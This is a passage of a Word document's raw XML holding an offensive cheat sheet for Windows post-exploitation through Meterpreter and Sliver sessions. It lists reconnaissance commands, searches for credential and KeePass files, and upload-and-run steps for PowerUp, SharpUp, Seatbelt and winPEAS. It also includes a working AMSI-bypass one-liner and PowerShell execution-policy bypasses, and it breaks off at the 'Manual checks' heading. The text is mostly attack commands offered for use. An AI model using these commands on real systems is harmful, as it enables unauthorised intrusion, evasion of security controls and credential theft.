    <w:p w14:paraId="5E117C88" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - Meterpreter: sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE35C73" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - Sliver: info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E88F6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="35B90F66" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2. If PowerShell is restricted, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17908137" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - Meterpreter: powershell -nop -exec bypass -c "..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB9E78F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - Sliver: execute -o powershell -a "-nop -exec bypass -c "...""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF524D9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7A93991B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>3. If AMSI is blocking scripts, bypass immediately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B659FD1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B0C3E8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1C5870DA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>4. Know your privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EE1F4F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - whoami /priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5533D172" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - whoami /groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF6E1A6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="7D3B71F8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>5. Understand Windows integrity levels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C904109" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">   - Low (AppContainer) → Medium (standard user) → High (admin) → System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751BDF8A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="495BB947" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006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EDFB447" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 1: INITIAL RECONNAISSANCE – "KNOW YOUR BATTLEFIELD"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4713FFAE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006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654481A9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="102F2D3A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1.1 – Basic System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6D512" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E890CEC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC19D77" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C2AF00" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C08BDC" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getprivs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C2503D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="598CFB6A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109607BF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B3F5FD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F0CF51" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    getprivs   (or shell whoami /priv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E1930" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3C291A35" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1.2 – Network &amp; Domain Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF3FF2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A4CE7B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0791F491" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056014C8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    net view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209E64E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    net user /domain   (if domain joined)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D52EFB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6D7834AA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378943A9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F5856F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell net view</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110CC167" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell net user /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31644A3C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6F80B404" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1.3 – Operating System Details (Patches &amp; Hotfixes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786DD96" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEF9F21" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B89472" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E23C2FD" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run post/windows/gather/enum_patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFC3B20" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="737524F2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70174E86" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492C5933" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    (Sliver's exploit-suggester uses this info automatically later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4566D05F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="145493FF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1.4 – User &amp; Group Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE5C0E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DE4454" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F009AF" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run post/windows/gather/enum_logged_on_users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B036C5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell net localgroup Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32063E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell net localgroup "Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49268131" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="65371AA0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E056690" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    net users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C4E26" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    shell net localgroup Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EC53F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1431D9A2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>1.5 – Interesting Files &amp; Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5776D240" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>──────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046CB626" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59947B90" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    search -f *.kdbx   (Keepass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30552026" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    search -f *.vmdk   (VM disks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF2DAB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    search -f *.rdp    (RDP caches)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D47C71F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run post/windows/gather/credentials/windows_autologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AECD79" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3E0D734C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250D0A5F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute-assembly Seatbelt.exe -group=Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053973D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute-assembly Seatbelt.exe -group=Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD9F88" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="4E3DE9DE" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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841BA1F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 2: DEEP AUTOMATED SCANNING – THE "GOLDEN FINDERS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E143F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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1AB9EB1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="2FF38BB2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2.1 – PowerUp.ps1 (The Classic – Comprehensive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4309A1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>──────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5276C" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>Upload and run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F565472" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="1DF256C8" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8076D" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload /usr/share/powershell-scripts/Privesc/PowerUp.ps1 C:\Users\Public\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41D974" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    load powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4036E4" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    powershell_import C:\Users\Public\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6986BD6A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    powershell_execute "Invoke-AllChecks"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711D7D9F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="13692F1B" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540D954" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload /path/to/PowerUp.ps1 C:\Users\Public\PowerUp.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DE4008" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -o powershell -a "-c . C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B6EE9" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="48EAD216" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>OUTPUT SCAN (save to file for review):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A6FFA" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    powershell -c ". C:\Users\Public\PowerUp.ps1; Invoke-AllChecks | Out-File C:\Users\Public\scan.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6CFCB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    download C:\\Users\\Public\\scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E6FE5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="6E67732A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2.2 – SharpUp (Compiled C# – More OPSEC, No PowerShell Dependence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9FD55" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27386F16" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER (needs execute-assembly – use 'pexec' or upload EXE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A643A" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload SharpUp.exe C:\Users\Public\SharpUp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B3D89E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -f C:\Users\Public\SharpUp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4689ED2E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="345CD800" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER (native execute-assembly):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D74D1E" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload SharpUp.exe C:\Users\Public\SharpUp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B65EED" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute-assembly C:\Users\Public\SharpUp.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D647A92" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="52BF1006" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2.3 – Seatbelt (Extremely Fast – Sliver Native, Meterpreter via Assembly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D69FFB" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>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2C425F0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER (built-in):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F06C82" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    seatbelt -group=all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477FAEE3" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="08651761" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293EA0B5" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload Seatbelt.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A809A2" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -f Seatbelt.exe -a "-group=system,users,services"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386696F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3687C282" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2.4 – WinPeas (The Most Exhaustive – but Noisy &amp; Large)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113DC062" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090A2A33" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66019BA6" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload winPEASx64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BD2730" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -f winPEASx64.exe -a "quiet"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01954E42" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="57E7EA14" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>SLIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770BF2A1" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    upload winPEASx64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20680F57" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    execute -o winPEASx64.exe -a "quiet"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53213207" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="3B8923F0" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>2.5 – Metasploit Built-in Suggesters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17348F86" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>──────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672B948" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>METERPRETER (only):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AE271" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100DB004" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t xml:space="preserve">    run post/windows/gather/enum_patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78264E4F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A"/>
    <w:p w14:paraId="70972A20" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A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238105F" w14:textId="77777777" w:rsidR="002D006A" w:rsidRDefault="002D006A" w:rsidP="002D006A">
      <w:r>
        <w:t>PART 3: MANUAL CHECKS (When Automated Tools Fail)</w:t>
      </w:r>
    </w:p>
